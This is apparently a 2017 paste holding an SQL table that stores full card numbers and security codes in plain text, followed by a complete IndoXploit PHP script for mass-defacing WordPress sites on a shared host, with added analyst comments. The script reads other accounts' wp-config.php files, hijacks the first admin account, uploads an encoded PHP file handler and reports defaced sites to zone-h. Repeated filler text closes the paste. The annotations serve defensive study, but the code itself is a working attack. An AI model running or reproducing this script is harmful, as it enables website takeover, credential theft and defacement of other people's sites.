APKAH1312

1

Mar 4th, 2017
  1. CREATE TABLE NextG3N APKAH  `credit_cards` (
      -- NOTE(review): the words "NextG3N APKAH" sit between CREATE TABLE and the table name, so the statement is not valid SQL as pasted.
      -- NOTE(review): this schema keeps the full card number and the card security code as plain varchar columns.
      -- PCI DSS does not allow the card verification code to be stored after authorization, and a stored card number
      -- has to be rendered unreadable (tokenised, truncated or strongly encrypted). A table shaped like this one is a
      -- finding in any audit of a payment flow, and finding it on a server that should not handle cards is worth investigating.
  2.   `id` int(11) NOT NULL AUTO_INCREMENT,
  3.   `card_number` varchar(255) NOT NULL,
  4.   `security_type` varchar(255) NOT NULL,
  5.   `security_code` varchar(255) NOT NULL,
  6.   `expiry_month` varchar(255) NOT NULL,
  7.   `expiry_year` varchar(255) NOT NULL,
  8.   PRIMARY KEY (`id`)
  9. ) ENGINE=MyISAM DEFAULT CHARSET=utf8;
  10.  
  11. <?php
  12. //Tu5b0l3d
  13. //IndoXploit
  14. //http://indoxploit.blogspot.com/2015/10/config-and-auto-deface-in-worpdress.html
  15.  
  16. error_reporting(0);
      // Turns PHP error reporting off for the rest of the script, so failed file reads,
      // database calls and HTTP requests further down produce no warnings.
  17.  
  18. cover("IndoXploit");
      // Prints the banner; cover() is defined further down in this file.
  19.  
  20. function save($data){
          // Appends $data to IndoXploit.htm in the script's working directory, then closes the file.
          // fopen() warnings are suppressed with @; if the file cannot be opened the script ends with "cant open file".
          // Defender note: an IndoXploit.htm file appearing in a web-served directory is an indicator
          // that this script has been run from that directory.
  21.         $fp = @fopen("IndoXploit.htm", "a") or die("cant open file");
  22.         fwrite($fp, $data);
  23.         fclose($fp);
  24. }
  25.  
  26. function anucurl($sites){
          // Fetches the URL in $sites with cURL and returns the response body as a string.
          // Redirects are followed, the connect timeout is 5 seconds, and a fixed Firefox 32 user-agent is sent.
          // TLS peer and host verification are both switched off, so any certificate is accepted.
          // Cookies are read from and written to a file named coker_log in the working directory.
          // This function is not called anywhere in the code shown on this page.
          // Defender note: the fixed user-agent string and a coker_log file next to the script are
          // artefacts that can be searched for in web logs and on disk.
  27.         $ch1 = curl_init ("$sites");
  28. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  29. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
  30. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  31. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
  32. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  33. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
  34. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
  35. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
  36. $data = curl_exec ($ch1);
  37. return $data;
  38.     }
  39.  
  40. function lohgin($cek, $web, $userr, $pass){
          // Sends a POST carrying the WordPress login form fields (log, pwd, rememberme, wp-submit,
          // redirect_to, testcookie) to the URL in $cek and returns the response body.
          //   $cek   - URL the form is posted to
          //   $web   - site base URL, used only to build redirect_to ("$web/wp-admin/")
          //   $userr - login name placed in the "log" field
          //   $pass  - password placed in the "pwd" field
          // Cookies are kept in the coker_log file, so the session set by one call is reused by later requests.
          // TLS peer and host verification are switched off.
          // Defender note: in access logs this shows up as a POST with the fixed Firefox 32 user-agent
          // coming from the server's own address; that pairing is unusual for a real administrator login.
  41.         $post = array(
  42.                     "log" => "$userr",
  43.                     "pwd" => "$pass",
  44.                     "rememberme" => "forever",
  45.                     "wp-submit" => "Log In",
  46.                     "redirect_to" => "$web/wp-admin/",
  47.                     "testcookie" => "1",
  48.                     );
  49. $ch = curl_init ("$cek");
  50. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  51. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  52. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  53. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  54. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  55. curl_setopt ($ch, CURLOPT_POST, 1);
  56. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  57. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  58. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  59. $data6 = curl_exec ($ch);
  60. return $data6;
  61.     }
  62.  
  63. function cover($indoXploit){
          // Prints a centred "Created By" banner with the name passed in, followed by a link to
          // IndoXploit.htm. The Indonesian text "hasil bisa dilihat di" means "results can be seen in".
          // The function only echoes HTML; it returns nothing.
  64.     echo "<center><font size='5px'> Created By: $indoXploit</font><br>";
  65.     echo "hasil bisa dilihat di <a href='IndoXploit.htm' style='text-decoration: none'>IndoXploit.htm</a></center><br><br><br>";
  66. }
  67.  
  68. function ambilKata($param, $kata1, $kata2){
          // Returns the part of $param that lies between the first occurrence of $kata1 and the
          // next occurrence of $kata2 after it. Returns FALSE when either marker is absent from $param.
          // The rest of the file calls it as ambilkata(); PHP function names are case-insensitive.
          // It is used below to pull single values out of wp-config.php text and out of HTML responses.
  69.     if(strpos($param, $kata1) === FALSE) return FALSE;
  70.     if(strpos($param, $kata2) === FALSE) return FALSE;
  71.     $start = strpos($param, $kata1) + strlen($kata1);
  72.     $end = strpos($param, $kata2, $start);
  73.     $return = substr($param, $start, $end - $start);
  74.     return $return;
  75. }
  76.  
  77.  
  78. $a = file_get_contents('/etc/passwd');
      // ANALYSIS NOTE (defender view). This top-level run is the body of a mass-defacement script for
      // WordPress sites on a shared host. The stages visible below are:
      //   1. take account names from /etc/passwd and try to read each account's wp-config.php;
      //   2. pull the database settings out of that file and connect to the database with them;
      //   3. overwrite the login name and password hash of the first row in the users table;
      //   4. log in over HTTP with the new credentials and push a PHP file through the theme uploader;
      //   5. use that file to place k.php in the site root, then report the URL to zone-h.
      // Stage 1 only succeeds when the PHP process can read other accounts' home directories.
      // Per-account PHP isolation, an open_basedir restriction, and wp-config.php permissions that
      // deny access to other users each stop the chain at the first step.
      // Artefacts named in this code, useful for a sweep: <user>-config.txt, coker_log, m.php, wew.php and
      // IndoXploit.htm in the directory the script ran from; m.php under wp-content/uploads/<year>/<month>/;
      // k.php in the site root; a users-table row whose user_login is 'Tu5b0l3d'.
  79.     preg_match_all('/(.*?):x:/', $a, $data);
  80.     foreach($data[1] as $user){
  81. $baca = file_get_contents("/home/$user/public_html/wp-config.php");
  82.  
  83.  /* symlink('/home/'.$user.'/public_html/wp-config.php',$user.'- config.txt');  */
  84.  
  85. if($baca!=""){
  86.    
  87.  
  88. /* $b = `cp /home/$user/public_html/index.php $user-index.txt`; */
  89.  
  90. $file1 = "$user-config.txt";
  91. $fp2 = fopen($file1,"w");
  92. fputs($fp2,$baca);
      // A copy of the victim's wp-config.php is now on disk as <user>-config.txt beside the script.
      // If the script sits in a web-served directory, the database credentials in that copy may be
      // downloadable by anyone; treat them as exposed and rotate them during clean-up.
  93.  
  94. $file = @file_get_contents($file1);
  95.  
  96.  
  97. echo $user."-> sukses<br>";
  98.                     $host = ambilkata($file,"DB_HOST', '","'");
  99.                     $username = ambilkata($file,"DB_USER', '","'");
  100.                     $password = ambilkata($file,"DB_PASSWORD', '","'");
  101.                     $db = ambilkata($file,"DB_NAME', '","'");
  102.                     $dbprefix = ambilkata($file,"table_prefix  = '","'");
  103.                     $user_baru = "Tu5b0l3d";
  104.                     $password_baru = "Tu5b0l3d";
  105.                     $prefix = $db.".".$dbprefix."users";
  106.                     $sue = $db.".".$dbprefix."options";
  107.                     $pass = md5("$password_baru");
  108.                     $nick = "Hacked By Bl4ck Root"; //must "hacked"
      // $user_baru / $password_baru are the fixed replacement login name and password ("baru" = "new").
      // $pass is a plain MD5 of that password, so a 32-hex-character user_pass value is an indicator.
      // $nick is the text later written to the defaced page; the success check further down looks for "hacked" in it.
  109.  
  110. echo "# Db Host: $host<br>";
  111. echo "# Db user: $username<br>";
  112. echo "# Db Password: $password<br>";
  113. echo "# Db name: $db<br>";
  114. echo "# Table_Prefix: $dbprefix<br>";
  115.  
  116. mysql_connect($host,$username,$password);
      // Connects with the credentials recovered above, through the legacy mysql_* extension.
  117.  
  118.         mysql_select_db($db);
  119.  
  120.         $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  121.         $r=mysql_fetch_array($tampil);
  122.         $id = $r[ID];
      // Only the first row is fetched, i.e. the users-table row with the lowest ID.
  123.  
  124.         $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
  125.         $r2=mysql_fetch_array($tampil2);
  126.         $target = $r2[option_value];
      // Takes option_value from the options row with the lowest option_id and uses it as the site URL.
      // NOTE(review): presumably that row is the site address on a default install; confirm against the schema.
  127.          echo "# $target<br>";
  128.        
  129.  
  130.          mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
      // Overwrites both the login name and the password hash of that account. Detection: the original
      // administrator can no longer log in, and the lowest-ID user now carries the login name set above.
      // Recovery means restoring the row from backup or resetting it by hand, and rotating the DB password.
  131.  
  132. $site= "$target/wp-login.php";
  133. $site2= "$target/wp-admin/theme-install.php?upload";
  134. $a = lohgin($site, $target, $user_baru, $password_baru);
  135. $b = lohgin($site2, $target, $user_baru, $password_baru);
  136.            
  137.  
  138. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
      // Extracts the _wpnonce form token from the theme-upload page returned by the second request.
  139. echo "# token -> $anu2<br>";
  140.  
  141.  
  142. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
      // Analyst note: the blob decodes to a short PHP upload handler. It accepts a form file named
      // "file3" and stores it as k.php four directory levels above wherever the handler itself sits.
  143.  
  144. $www = "m.php";
  145. $fp5 = fopen($www,"w");
  146. fputs($fp5,$upload3);
  147.  
  148. $c = file_get_contents($w);
  149.    
  150.   $post2 = array(
  151.                     "_wpnonce" => "$anu2",
  152.                     "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  153.                     "themezip" => "@m.php",
  154.                     "install-theme-submit" => "Install Now",
  155.                     );
      // m.php is submitted through the admin theme uploader as the "themezip" field, using cURL's
      // legacy "@file" upload form. Mitigations on the WordPress side: set DISALLOW_FILE_MODS in
      // wp-config.php so theme and plugin uploads are refused, and configure the web server so that
      // PHP files under wp-content/uploads are never executed.
  156. $ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
  157. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  158. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  159. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  160. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  161. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  162. curl_setopt ($ch, CURLOPT_POST, 1);
  163. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
  164. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  165. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  166. $data3 = curl_exec ($ch);
  167.  
  168. $namafile = "wew.php";
  169. $fp2 = fopen($namafile,"w");
  170. fputs($fp2,$nick);
      // wew.php holds nothing but the defacement text from $nick.
  171.  
  172. $y = date("Y");
  173. $m = date("m");
  174.  
  175.  
  176. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
      // Requests the uploaded handler at the current year/month uploads path and posts wew.php to it
      // as "file3". In access logs this is a POST to a .php file under wp-content/uploads, which a
      // normal site never receives and is a reliable alerting rule.
  177. curl_setopt($ch6, CURLOPT_POST, true);
  178. curl_setopt($ch6, CURLOPT_POSTFIELDS,
  179. array('file3'=>"@$namafile"));
  180. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  181. curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
  182. $postResult = curl_exec($ch6);
  183. curl_close($ch6);
  184.  
  185. $as = "$target/k.php";
  186. $bs = file_get_contents($as);
      // Success check: fetches <site>/k.php and looks for the word "hacked" (case-insensitive) in it.
  187.  if(preg_match("#hacked#si",$bs)){
  188.                         echo "# <font color='green'>berhasil mepes...</font><br>";
  189.                         echo "# $as<br>";
  190.                         save($as."<br>");
  191.                         echo "# zone-h: ";
      // On success the URL is appended to IndoXploit.htm and submitted to the zone-h defacement archive
      // over plain HTTP. An outbound request from a web server to that notify endpoint is itself a
      // useful egress-monitoring signal.
  192.                         $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  193.                         curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  194.                         curl_setopt ($ch3, CURLOPT_POST, 1);
  195.                         curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=ID-IM&domain1=$as&hackmode=1&reason=1");
  196.                        
  197.         if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
  198.                 echo  " Ok  <br><br>";
  199.         }else{
  200.                 echo " No <br><br>";}
  201.                     }
  202.                     else{
      // Failure branch: prints the login URL and the replacement credentials for manual use. The
      // account change made by the UPDATE above stays in place even though no file was planted.
  203.                         echo "# <font color='red'>gagal mepes...</font><br>";
  204.                         echo "# coba aja manual: <br>";
  205.                         echo "# $target/wp-login.php<br>";
  206.                         echo "# username: $user_baru<br>";
  207.                         echo "# password: $password_baru<br><br><br>";
  208.  
  209.                        
  210.                     }
  211.     }
  212. else{
      // Reached when wp-config.php for this account could not be read or was empty.
  213.     echo "$user <= No<br>";
  214. }
  215.  
  216.  
  217.  
  218. }
  219.  
  220.  
  221. ?>
  222.  
  223.  
  224.  
  225.  
  226. NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH